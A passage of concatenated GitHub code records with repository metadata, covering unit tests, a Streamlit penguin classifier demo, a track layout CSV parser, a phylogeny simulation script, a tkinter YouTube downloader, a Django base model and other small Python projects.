self.normalizer.cars_dataframe[\"Year\"].dtype)\n\n def test_get_normalized_dataframe(self):\n final_dataframe = self.normalizer.get_normalized_dataframe()\n self.assertEqual(0, final_dataframe.isnull().values.sum())\n self.assertEqual(\"datetime64[ns]\", 
self.normalizer.cars_dataframe[\"Year\"].dtype)\n\n\nclass CarDataReporterTest(unittest.TestCase):\n\n def test_get_number_of_unique_cars(self):\n test_dict = {'Name': ['Car A', 'Car B', 'Car A', 'Car C', 'Car B']}\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"There is a total of 3 unique cars in the dataset.\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__get_number_of_unique_cars())\n\n\n def test_calculate_average_horse_power(self):\n test_dict = {'Horsepower': [110, 120, 150, 190, 400, 200, 90]}\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"The average horsepower of the cars in the dataset is 180.0.\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__calculate_average_horse_power())\n\n def test_determine_heaviest_cars(self):\n test_dict = {\n 'Name': ['Car A', 'Car B', 'Car C', 'Car D', 'Car E', 'Car F', 'Car G'],\n 'Weight_in_lbs': [4000, 3500, 4500, 3800, 5000, 5500, 2500]\n }\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"These 5 cars are the heaviest in the dataset:\\n\" \\\n \"5 Car F\\n\" \\\n \"4 Car E\\n\" \\\n \"2 Car C\\n\" \\\n \"0 Car A\\n\" \\\n \"3 Car D\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__determine_heaviest_cars())\n\n def test_get_number_of_cars_made_by_each_manufacturer(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla', 'Honda Accord', 'Ford Mustang'],\n }\n test_dataframe = pd.DataFrame(data)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"This is how many cars have been made by each manufacturer:\\n\" \\\n \"Manufacturer\\n\" \\\n \"Toyota 2\\n\" \\\n \"Ford 2\\n\" \\\n \"Honda 1\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__get_number_of_cars_made_by_each_manufacturer())\n\n def test_get_number_of_cars_made_each_year(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla'],\n 'Year': ['2020-01-01', '2020-01-01', '2021-01-01']\n }\n df = pd.DataFrame(data)\n df['Year'] = pd.to_datetime(df[\"Year\"], format=\"%Y-%m-%d\")\n data_reader = CarDataReporter(df)\n cars_by_year = data_reader._CarDataReporter__get_number_of_cars_made_each_year()\n expected_result = \"This is how many cars are made each year:\\n\\r\" \\\n \"Year\\n\" \\\n \"2020 2\\n\" \\\n \"2021 1\"\n self.assertEqual(cars_by_year, expected_result)\n\n def test_save_dataframe_to_csv(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla'],\n 'Year': ['2020-01-01', '2020-01-01', '2021-01-01']\n }\n df = pd.DataFrame(data)\n data_reader = CarDataReporter(df)\n result = data_reader._CarDataReporter__save_dataframe_to_csv()\n expected_result = \"The data has been saved in cars.csv\"\n self.assertEqual(result, expected_result)\n self.assertTrue(os.path.exists(\"cars.csv\"))\n # os.remove(\"cars.csv\")\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bisera-ivanova/adastra_cars_task","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16609218676","text":"import unittest\n\nfrom aops_check.core.experiment.algorithm.multi_item_check.statistical_multi_item_check import StatisticalCheck\n\n\nclass TestStatisticalMultiItemCheckTestCase(unittest.TestCase):\n 
\"\"\"\n test statistical multi-item check algo\n \"\"\"\n def test_calculate_should_return_true_when_error_rate_acceptable(self):\n algorithm = StatisticalCheck(1)\n data = [{\"metric_name\": \"scrape_duration_seconds\", \"metric_label\": {}},\n {\"metric_name\": \"scrape_samples_scraped\", \"metric_label\": {}}]\n res = algorithm.calculate(data)\n self.assertEqual(res, False)\n\n def test_calculate_should_return_false_when_error_rate_unacceptable(self):\n algorithm = StatisticalCheck(0.5)\n data = [{\"metric_name\": \"scrape_duration_seconds\", \"metric_label\": {}},\n {\"metric_name\": \"scrape_samples_scraped\", \"metric_label\": {}}]\n res = algorithm.calculate(data)\n self.assertEqual(res, True)\n","repo_name":"openeuler-mirror/A-Ops","sub_path":"aops-check/aops_check/tests/core/experiment/algorithm/multi_item_check/test_statistical_multi_item_check.py","file_name":"test_statistical_multi_item_check.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"30174929086","text":"import streamlit as st\n\nst.set_page_config(\n page_title=\"Decision Trees - Beginner Machine Learning\",\n page_icon=\"🤖\",\n)\nst.header(\"Decision Trees Demo 🌲\", \"nlp\")\n\nst.write(\n \"\"\"Use (GBDT) Gradient Boosted Decision Trees to 'classify' a set of 'feature' inputs with a certain output 'label'.\nThe 'HistGradientBoostingClassifier' model attempts to learn how input features relate to output labels with randomized Decision Trees.\nThe implementation in [scikit-learn](https://scikit-learn.org/stable/modules/ensemble.html#histogram-based-gradient-boosting) utilizes elements from LightGBM and XGBoost.\n\nThis Example:\n\n- Use Penguin 'features' such as Bill Length and Body Mass\n- 'label' a set of observed features with the most likely Penguin species\n- Train the 'Classifier' model on a set of real observations from [Palmer Station](https://allisonhorst.github.io/palmerpenguins/) in Antarctica!\n\nOther awesome app features:\n- Downloading Models\n- Multi-field input forms\n\nPowered by [Scikit-Learn](https://scikit-learn.org/stable/index.html) and [Streamlit](https://docs.streamlit.io/).\nBuilt with ❤️ by [Gar's Bar](https://tech.gerardbentley.com/)\n\"\"\"\n)\n\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import HistGradientBoostingClassifier\nfrom sklearn.inspection import permutation_importance\nfrom sklearn.model_selection import cross_validate, train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\n\n\ndef render_end():\n st.write(\n \"\"\"## Take it further:\n\n- Compare results to simpler tabular models (Regression, Random Forest) or other Gradient Boosting implementations (XGBoost, LightGBM, CatBoost)\n- Perform a 'regression' task instead of 'classification' to get a pseudo-confidence score from the model\n- Utilize Cross-Validation with Quantile Losses or Mean losses to assess confidence intervals\n- Explore tabular models in other use cases such as Time Series analysis\n \"\"\"\n )\n\n if st.checkbox(\"Show Code (~200 lines)\"):\n with open(__file__, \"r\") as f:\n st.code(f.read())\n st.stop()\n\n\n@st.experimental_memo\ndef run_training(features, labels):\n model = HistGradientBoostingClassifier(\n random_state=47, categorical_features=categorical_column_mask\n )\n features_train, features_test, labels_train, labels_test = train_test_split(\n features, labels, random_state=47\n )\n 
model.fit(features_train, labels_train)\n labels_predicted = model.predict(features_test)\n labels_predicted_train = model.predict(features_train)\n test_score = accuracy_score(labels_predicted, labels_test)\n train_score = accuracy_score(labels_predicted_train, labels_train)\n feature_importance = get_importances(model, features_train, labels_train)\n\n labels_predicted_display = species_encoder.inverse_transform(labels_predicted)\n labels_test_display = species_encoder.inverse_transform(labels_test)\n results = pd.DataFrame(\n {\n \"Predicted Species\": labels_predicted_display,\n \"Actual Species\": labels_test_display,\n **features_test[feature_cols],\n }\n )\n return model, results, feature_importance, train_score, test_score\n\n\ndef get_importances(model, features, labels):\n result = permutation_importance(\n model, features, labels, n_repeats=10, random_state=47\n )\n\n sorted_importances_idx = result.importances_mean.argsort()\n importances = pd.DataFrame(\n result.importances[sorted_importances_idx].T,\n columns=features.columns[sorted_importances_idx],\n )\n return importances\n\n\npenguin_df = pd.read_csv(\n \"data/penguins.csv\",\n dtype={\"species\": \"category\", \"island\": \"category\", \"sex\": \"category\"},\n)\npenguin_df = penguin_df.dropna()\n\nwith st.expander(\"Raw Data\"):\n penguin_df\n\nif st.checkbox(\"Show Feature Comparison\", True):\n x_label = st.selectbox(\n \"X Axis Feature\",\n penguin_df.columns,\n penguin_df.columns.get_loc(\"bill_length_mm\"),\n )\n y_label = st.selectbox(\n \"Y Axis Feature\",\n penguin_df.columns,\n penguin_df.columns.get_loc(\"bill_depth_mm\"),\n )\n fig, ax = plt.subplots()\n penguin_df.plot.scatter(x_label, y_label, c=\"species\", ax=ax, colormap=\"rainbow\")\n ax.set_title(f\"Scatter Plot Feature Comparison: {x_label} x {y_label}\")\n ax.axvline(x=0, color=\"k\", linestyle=\"--\")\n ax.axhline(y=0, color=\"k\", linestyle=\"--\")\n ax.figure.tight_layout()\n st.pyplot(fig)\n\nspecies_encoder = LabelEncoder()\nisland_encoder = LabelEncoder()\nsex_encoder = LabelEncoder()\n\nlabels = species_encoder.fit_transform(penguin_df[\"species\"])\nfeature_cols = [\n \"island\",\n \"bill_length_mm\",\n \"bill_depth_mm\",\n \"flipper_length_mm\",\n \"body_mass_g\",\n \"sex\",\n]\ncategorical_column_mask = [column in (\"island\", \"sex\") for column in feature_cols]\n\nfeatures = penguin_df[feature_cols]\nfeatures[\"island\"] = island_encoder.fit_transform(penguin_df[\"island\"])\nfeatures[\"sex\"] = sex_encoder.fit_transform(penguin_df[\"sex\"])\n\n\nif not st.checkbox(\"Press Here to Train Model on 75% of the data\"):\n render_end()\n\nmodel, results, feature_importance, train_score, test_score = run_training(\n features, labels\n)\nwith st.expander(\"Missed Predictions\"):\n results[results[\"Predicted Species\"] != results[\"Actual Species\"]]\n\nif st.checkbox(\"Show Feature Importance\", key=\"feat_importance\"):\n fig, ax = plt.subplots()\n feature_importance.plot.box(vert=False, whis=10, ax=ax)\n ax.set_title(\"Permutation Importances\")\n ax.axvline(x=0, color=\"k\", linestyle=\"--\")\n ax.set_xlabel(\"Decrease in accuracy score\")\n ax.figure.tight_layout()\n st.pyplot(fig)\n\nst.download_button(\n f\"Download Trained Model\",\n pickle.dumps(model),\n help=\"Download the model weights to be used for future predictions\",\n)\n\nst.header(\"Predict your own Penguin's species 🐧\")\n\nwith st.form(\"user_inputs\"):\n island = st.selectbox(\"Penguin Island\", options=list(penguin_df[\"island\"].unique()))\n sex = st.selectbox(\"Sex\", 
options=list(penguin_df[\"sex\"].unique()))\n bill_length = st.number_input(\"Bill Length (mm)\", min_value=0)\n bill_depth = st.number_input(\"Bill Depth (mm)\", min_value=0)\n flipper_length = st.number_input(\"Flipper Length (mm)\", min_value=0)\n body_mass = st.number_input(\"Body Mass (g)\", min_value=0)\n is_submitted = st.form_submit_button()\n\nif not is_submitted:\n st.info(\"Hit 'Submit' to predict your Penguin's species\")\nelse:\n feature_input = {\n \"island\": island,\n \"bill_length\": bill_length,\n \"bill_depth\": bill_depth,\n \"flipper_length\": flipper_length,\n \"body_mass\": body_mass,\n \"sex\": sex,\n }\n st.json(feature_input)\n feature_input[\"island\"] = island_encoder.transform([island])[0]\n feature_input[\"sex\"] = sex_encoder.transform([sex])[0]\n with st.expander(\"Show Transformed User Input\"):\n feature_input\n prediction = model.predict([[*feature_input.values()]])\n with st.expander(\"Raw Prediction\"):\n prediction[0]\n (species,) = species_encoder.inverse_transform([prediction])\n st.success(f\"Most likely an **{species}** Penguin!\")\n\nrender_end()\n","repo_name":"gerardrbentley/Beginner-ML-Projects","sub_path":"pages/04_Decision_Trees.py","file_name":"04_Decision_Trees.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26180093412","text":"from copy import deepcopy\nimport csv\n\ndef parseTrackLayout(path, size=15):\n\n REQUIRED_FIELDS = ['Line', 'Section', 'Block Number', 'Infrastructure']\n numBlocksPerController = size\n\n controller = {\n \"block-occupancy\" : [],\n \"switch-state\" : [],\n \"crossing-state\" : [],\n \"total-blocks\" : 0\n }\n\n CONTROLLERS = []\n TOTAL_BLOCKS = 0\n\n with open(path, mode='r') as file:\n ## Read Header\n getRank = csv.DictReader(file)\n if size == 0:\n numBlocksPerController = sum(1 for row in getRank)\n\n ## Return to the top of the file - is there a better solution?\n file.seek(0)\n track_layout = csv.DictReader(file)\n\n ## Check for required headers\n for header in REQUIRED_FIELDS:\n if header not in track_layout.fieldnames:\n print(f\"{header} not found in file...\")\n print('exiting')\n exit(1)\n\n ## Populate data in to line\n for row in track_layout:\n\n TOTAL_BLOCKS += 1\n ## Adding a new controller\n\n ## Increment the number of blocks assigned\n ## to that controller\n controller['total-blocks'] += 1\n\n ## populate block-occupancy\n controller['block-occupancy'].append((row['Block Number'], row['Section'], False))\n\n ## populate switch-state\n if row['Infrastructure'] != None and \"SWITCH\" in row['Infrastructure']:\n controller['switch-state'].append((row['Block Number'], row['Section'], False))\n\n ## populate crossing-state\n if row['Infrastructure'] != None and \"CROSSING\" in row['Infrastructure']:\n controller['crossing-state'].append((row['Block Number'], row['Section'], False))\n\n if size > 0:\n if TOTAL_BLOCKS % numBlocksPerController == 0:\n CONTROLLERS.append(deepcopy(controller))\n controller['block-occupancy'].clear()\n controller['crossing-state'].clear()\n controller['switch-state'].clear()\n controller['total-blocks'] = 0\n\n CONTROLLERS.append(deepcopy(controller))\n\n file.close()\n return CONTROLLERS\n\nif __name__ == '__main__':\n print(parseTrackLayout(\"Track Layout & Vehicle Data vF.xlsx - Green 
Line.csv\"))","repo_name":"vism2889/ECE_1140_TRAINS","sub_path":"Pittsburgh-Light-Rail-App/WaysideController/ui/presentation/track_layout/extract_layout.py","file_name":"extract_layout.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"10617235716","text":"import os\nimport pandas as pd \nimport numpy as np\n\ntaxo_names=\"taxo_names.txt\"\ntaxo_DB=\"131-combined_database_metadata.txt\"\n\nif not os.path.exists(taxo_names):\n df=pd.read_table(taxo_DB) \n #df[\"Strain of origin\"]=[str(i).replace(\".\",\"\") for i in df[\"Strain of origin\"]]\n taxa=df[\"Strain of origin\"].astype(np.string_)\n f=lambda x: \"_\".join(x.decode().replace(\".\",\"\").split()[:2])\n taxa=taxa.apply(f)\n counts=taxa.value_counts()\n top_199=counts[:199]\n top_199=top_199.sort_index()\n top_199.to_csv(taxo_names,sep=\"\\t\")\n\nelse:\n top_199=pd.Series.from_csv(taxo_names,sep=\"\\t\")\n\n\n###Now construct a DataFrame\nnum_taxa=len(top_199)\nbitReps=[str(1<1:\n \n sample1=np.random.choice(list(allowed_samples))\n allowed_samples.remove(sample1)\n sample2=np.random.choice(list(allowed_samples))\n \n Newick1,Newick2=dataStruct.loc[sample1,\"Newick_rep\"],dataStruct.loc[sample2,\"Newick_rep\"]\n combined_Newick=\"({},{})\".format(Newick1,Newick2)\n \n bitRep1,bitRep2=dataStruct.loc[sample1,\"bitRep\"],dataStruct.loc[sample2,\"bitRep\"]\n combined_bitRep=int(bitRep1)|int(bitRep2)\n bitRep_toAppend=bin(combined_bitRep)[2:].zfill(num_taxa)\n true_bitArray.append(bitRep_toAppend)\n\n ##Replace the construct that can still be sampled with combined values\n dataStruct.loc[sample2,\"Newick_rep\"]=combined_Newick\n dataStruct.loc[sample2,\"bitRep\"]=str(combined_bitRep)\n\n ##Write out to file\n fiii.write(bitRep_toAppend+\"\\n\")\n\n Newick_out=combined_Newick.replace(\"(\",\"\").replace(\")\",\"\").split(\",\")\n fiii.write(\"\\t\".join(Newick_out)+\"\\n\")\n\nfiii.close()\n\n# print(combined_Newick)\n\n#Remove the last bitArray which is all 1's\ntrue_bitArray.pop()\n\nlast_sample=list(allowed_samples)[0]\nfinal_Newick=dataStruct.loc[last_sample,\"Newick_rep\"]\n\nwith open(\"simulated_problem.txt\",\"w\") as f:\n f.write(final_Newick)\n\nwith open(\"simulated_solution.txt\",\"w\") as f:\n f.write(\"\\n\".join(true_bitArray))\n","repo_name":"bricoletc/ctbl","sub_path":"simu/build_simu.py","file_name":"build_simu.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34618402945","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 28 16:36:36 2020\n\n@author: Fin Christie\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_csv (r\"C:\\Users\\Fin Christie\\Documents\\Uni\\4th Year\\EM401\\Data\\Data from Graeme's Sharefile\\2019\\BAVs.csv\")\ndf_list = df['T_KILBW-1'].tolist()\naggregated_data = []\nhourly_data = []\n\nfor row, val in enumerate(df_list):\n hourly_data.append(df_list[row])\n \n if len(hourly_data) == 2:\n aggregated_data.append((sum(hourly_data)*1000))\n hourly_data.clear()\n \n \n \n ","repo_name":"FinChristie/Green_Hydrogen_Production_Project","sub_path":"DataConv.py","file_name":"DataConv.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"617467333","text":"import GRT\nimport sys\nimport math\n\ndef main():\n # Create a new instance of an FFT with a window size of 256 and a hop size of 1 for a 1 
dimensional signal\n # Note, it is important that when you use an FFT with the FFTFeatures module that the FFT module computes the magnitude, but does not compute the phase\n fftWindowSize = 256\n fftHopSize = 1\n numInputDimensions = 1\n computeMagnitude = True\n computePhase = False\n fft = GRT.FFT(fftWindowSize,fftHopSize,numInputDimensions,GRT.FFT.RECTANGULAR_WINDOW,computeMagnitude,computePhase)\n\n # Create a new fftFeatures instance and pass in the size of the FFT window and the number of input dimensions to the FFT instance\n fftFeatures = GRT.FFTFeatures(int(fft.getFFTWindowSize()/2),numInputDimensions)\n\n # Create some varaibles to help generate the signal data\n numSeconds = 10 # The number of seconds of data we want to generate\n t = 0.0 # This keeps track of the time\n tStep = 1.0/1000.0 # This is how much the time will be updated at each iteration in the for loop\n freq = 100.0 # Stores the frequency\n\n # Generate the signal and filter the data\n for i in range(numSeconds*1000):\n\n # Generate the signal\n signal = math.sin( t * math.tau * freq )\n \n # Compute the FFT of the input signal\n fft.update( signal )\n \n # Compute the features from the FFT\n fftFeatures.computeFeatures( fft.getFeatureVector() )\n \n # Get the feature vector from the FFT features instance and print the values\n print(fftFeatures.getFeatureVector())\n\n # Update the t\n t += tStep\n \n \n # Save the settings to a file\n if not fftFeatures.save( \"FFTFeatures.grt\" ):\n print(\"Error: Failed to save fft features to settings file!\")\n sys.exit(1)\n \n\n # Load the setting back from a file again\n if not fftFeatures.load( \"FFTFeatures.grt\" ):\n print(\"Error: Failed to load fft features from settings file!\")\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)","repo_name":"nickgillian/grt","sub_path":"build/python/examples/FeatureExtractionModulesExamples/FFT_features_example.py","file_name":"FFT_features_example.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"11707917690","text":"import os\nimport unittest\nfrom unittest.case import skipIf\n\nfrom store import Store\n\nredis_host = os.environ.get(\"REDIS_HOST\", False)\nredis_port = os.environ.get(\"REDIS_PORT\", False)\n\n\n@skipIf(not (redis_host and redis_port), \"Store connection parameters weren't passed\")\nclass TestStore(unittest.TestCase):\n def setUp(self):\n self.store = Store(host=redis_host, port=redis_port)\n\n def test_get(self):\n expected_value = \"value from redis\"\n key = \"key_1\"\n\n self.store.set(key, expected_value, 60 * 60)\n\n res = self.store.get(key).decode(\"utf-8\")\n self.assertEqual(res, expected_value)\n\n def test_cache_get(self):\n expected_value = \"value from redis\"\n key = \"key_2\"\n\n self.store.set(key, expected_value, 60 * 60)\n\n res = self.store.cache_get(key).decode(\"utf-8\")\n\n self.assertEqual(res, expected_value)\n\n def test_cache_set(self):\n expected_value = \"value from redis\"\n key = \"key_3\"\n\n self.store.cache_set(key, expected_value, 60 * 60)\n\n res = self.store.cache_get(key).decode(\"utf-8\")\n\n self.assertEqual(res, expected_value)\n","repo_name":"tatiana-vakhrameeva/python-course","sub_path":"hw3-1/tests/integration/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5189342959","text":"from django.db import 
models\nfrom django.contrib.auth.models import User\n\n\nclass BaseModel(models.Model):\n\n class Meta:\n abstract = True\n\n active = models.BooleanField(default=True)\n created_by = models.ForeignKey(\n User,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"%(class)s_created_by\",\n )\n created_on = models.DateTimeField(auto_now_add=True)\n updated_by = models.ForeignKey(\n User,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"%(class)s_updated_by\"\n )\n updated_on = models.DateTimeField(auto_now=True)","repo_name":"FSC-Portfolio/chalkerone","sub_path":"api_v0/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17053259732","text":"from setuptools import setup\n\nfrom pybib import __version__\n\nwith open('README.rst') as f:\n readme = f.read()\n\nsetup(name='pybib',\n version=__version__,\n description='Fetch citation information, given a Digital Object Identifier',\n long_description=readme,\n url='https://github.com/jgilchrist/pybib',\n author='Jonny Gilchrist',\n packages=['pybib'],\n install_requires=[\n 'requests',\n 'python-termstyle',\n ],\n entry_points = {\n 'console_scripts': [\n 'bib = pybib:main'\n ]\n }\n)\n","repo_name":"amir17688/google_data_p2","sub_path":"76613_setup.py_C__Users_user_Desktop_data_2_data_google_data_jgilchrist_pybib.py","file_name":"76613_setup.py_C__Users_user_Desktop_data_2_data_google_data_jgilchrist_pybib.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37996270866","text":"from tkinter import *\nfrom tkinter.ttk import *\nimport tkinter.messagebox as tmsg\nfrom pytube import YouTube\nroot = Tk()\n\ncheck = False\ndefaultPath = \"C:/Users/Lenovo/Desktop/Coding/Tkinter/chat-gpt\"\n\n# All Logic\n# Add path where to stored download\ndef addPath():\n # Geometry and title\n newWindow = Toplevel(root)\n newWindow.geometry(\"600x700\")\n newWindow.title(\"YouTube Downloader Tool\")\n\n # width,height\n newWindow.minsize(300,300)\n\n # width,height\n newWindow.maxsize(300,300)\n\n newWindow.wm_iconbitmap(\"youtube.ico\")\n\n # Add path Gui\n global pathValue\n pathLabel = Label(newWindow, text=\"Add Path\").pack(padx=10,pady=4)\n pathValue = StringVar()\n with open(\"path.txt\", \"r\") as f: \n data = f.read()\n if(len(data)>0):\n pathValue.set(data)\n pathEntry = Entry(newWindow, textvariable=pathValue).pack(pady=2)\n addBtn = Button(newWindow, text=\"Add\", command=Add).pack(pady=2)\n\n# adding path to a path.txt \ndef Add(): \n f = open(\"path.txt\", \"w\")\n f.write(pathValue.get())\n f.close()\n tmsg.showinfo(\"Added\", \"Your path is Added\")\n\n# About of this project\ndef about():\n tmsg.showinfo(\"About\", \"\"\"This is a youtube video Downloader in which you can download video. You can download one video at one time. 
You can't download age-restriction video.\"\"\")\n\n# Choose in which format object will downlaod(audio or video, both(Video))\ndef Format():\n global check\n if(len(urlVar.get())>0):\n if(len(var_type.get())>0): \n statusvar.set(\"Waiting...\")\n sbar.update() \n link = urlVar.get()\n try:\n youtube = YouTube(link)\n except:\n tmsg.showinfo(\"Error!\", \"Somethings wrong maybe you entered wrong url or internet issue.\")\n statusvar.set(\"Ready\")\n else:\n global title\n global videos\n global yt_length\n title = youtube.title \n yt_length = str(youtube.length) \n\n if(var_type.get()==\"Audio\"):\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(only_audio=True)\n except:\n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restricted in thsi video.\")\n statusvar.set(\"Ready\")\n else: \n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n\n elif(var_type.get()==\"Video\"):\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(only_video=True)\n except: \n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restricted in thsi video.\")\n statusvar.set(\"Ready\")\n else: \n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n\n else:\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(progressive=True)\n except: \n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restriction in this video.\")\n statusvar.set(\"Ready\")\n else:\n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n \n if(check==True): \n typebar.set(\"(Title): \"+title+\" \"+\" \\n(\"+yt_length+\" seconds)\") \n type_video.pack(pady=15, anchor=CENTER)\n lbx.pack(fill=X)\n download.pack(pady=8,anchor=CENTER)\n downloadEntry.pack(anchor=CENTER)\n dPath.pack(pady=4,anchor=CENTER)\n downloadBtn.pack(pady=2,anchor=CENTER)\n statusvar.set(\"Ready\")\n\n# Downloading Function\ndef downloading():\n val = downloadVar.get()\n if(len(val)>0):\n val = int(val)\n statusvar.set(\"downloading...\")\n sbar.update() \n\n try:\n if(dVar.get()==0):\n try: \n with open(\"path.txt\", \"r\") as f:\n data = f.read()\n if(len(data)>0):\n videos[val].download(data) \n else:\n videos[val].download(defaultPath) \n except:\n videos[val].download(defaultPath) \n elif(dVar.get()==1):\n videos[val].download(defaultPath) \n except:\n tmsg.showinfo(\"Error\", \"Somethings wrong maybe you entered wrong No.(integer) or internet issue.\")\n statusvar.set(\"Ready\")\n else: \n statusvar.set(\"Ready\")\n tmsg.showinfo(\"Download\", \"Your content is downloaded\")\n\n\n# Geometry and title\nroot.geometry(\"600x700\")\nroot.title(\"YouTube Downloader Tool\")\n\n# width,height\nroot.minsize(600,700)\n\n# width,height\nroot.maxsize(600,700)\n\nroot.wm_iconbitmap(\"youtube.ico\")\n\n# Menus and submenu\nmainmenu = Menu(root)\nm1 = Menu(mainmenu, tearoff=0)\nm1.add_command(label=\"Add download path\", command=addPath)\nroot.config(menu=mainmenu)\nmainmenu.add_cascade(label='File', menu=m1)\n\nmainmenu.add_command(label=\"About\", command=about)\nroot.config(menu=mainmenu)\n\nmainmenu.add_command(label=\"Exit\", command=quit)\nroot.config(menu=mainmenu)\n\n# Url of Youtube Video\nurl = Label(root, text=\"Enter Url\").pack(pady=4,anchor=CENTER)\nurlVar = StringVar()\nurlEntry = Entry(root, textvariable=urlVar).pack(anchor=CENTER)\n\n# show audio or video \nvar_type = StringVar()\nradio = Radiobutton(root, text=\"Audio(Only)\", variable=var_type, 
value=\"Audio\").pack(pady=4)\nradio = Radiobutton(root, text=\"Video(Only)\", variable=var_type, value=\"Video\").pack()\nradio = Radiobutton(root, text=\"Video(Both)\", variable=var_type, value=\"VideoB\").pack(padx=8,pady=3)\nurlBtn = Button(root, text=\"Choose Format\", command=Format).pack(pady=2,anchor=CENTER)\n\n# Type of video label\ntypebar = StringVar()\ntype_video = Label(root, textvariable=typebar)\nlbx = Listbox(root)\n\n# input in (int) for downloading\ndownload = Label(root, text=\"Enter No.\")\ndownloadVar = StringVar()\ndownloadEntry = Entry(root, textvariable=downloadVar)\ndVar = IntVar()\ndPath = Checkbutton(text=\"Want to download in default path ?\", variable = dVar)\ndownloadBtn = Button(root, text=\"download\", command=downloading)\n\n\n# Status Bar\nstatusvar = StringVar()\nstatusvar.set(\"Ready\")\nsbar = Label(root, textvariable=statusvar, relief=SUNKEN, anchor=\"w\")\nsbar.pack(side=BOTTOM, fill=X)\n\n# Note for users\nnote = Label(root, text=''' Note: \\n 1. If you have to downlaod content then you have to choose number(integer) eg-1,2,3,0 then it will downloaded. \\n\n 2. If you provide path then content will saved on your given specific path rather than default path(if you checked). \\n\n 3. If you don't provide path then content will saved in default location(if not checked).''').pack(side=BOTTOM, pady=30)\n\nroot.mainloop()","repo_name":"MrRiteshKode/Youtube-video-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74619566007","text":"import numpy as np\nfrom CompetitionBot.create_ds_for_annotations import get_reference_documents\nimport matplotlib.pyplot as plt\nimport os\nimport pickle\n\n\ndef read_file(reference_docs,file,index,stats):\n\n with open(file) as f:\n for line in f:\n query = line.split()[0]\n doc = line.split()[1].split(\"-\")[3]\n similarity = float(line.split()[3].rstrip())\n if doc in reference_docs[query]:\n if index not in stats[\"Bot\"]:\n stats[\"Bot\"][index]={}\n if query not in stats[\"Bot\"][index]:\n\n stats[\"Bot\"][index][query]=[]\n stats[\"Bot\"][index][query].append(similarity)\n elif doc.__contains__(\"dummy_doc\"):\n if index not in stats[\"Dummy\"]:\n stats[\"Dummy\"][index]={}\n if query not in stats[\"Dummy\"][index]:\n\n stats[\"Dummy\"][index][query]=[]\n stats[\"Dummy\"][index][query].append(similarity)\n else:\n if index not in stats[\"Active\"]:\n stats[\"Active\"][index]={}\n if query not in stats[\"Active\"][index]:\n\n stats[\"Active\"][index][query]=[]\n stats[\"Active\"][index][query].append(similarity)\n for group in stats:\n for query in stats[group][index]:\n stats[group][index][query] = np.mean(stats[group][index][query])\n stats[group][index]=np.mean([stats[group][index][q] for q in stats[group][index]])\n return stats\n\ndef gather_stats(dir):\n stats = {\"Bot\": {}, \"Active\": {}, \"Dummy\": {}}\n f = open(\"ref_docs\",\"rb\")\n ref_docs=pickle.load(f)\n f.close()\n\n # pickle.dump(ref_docs,open(\"ref_docs\",\"wb\"))\n for file in os.listdir(dir):\n index = file.split(\"_\")[2]\n stats = 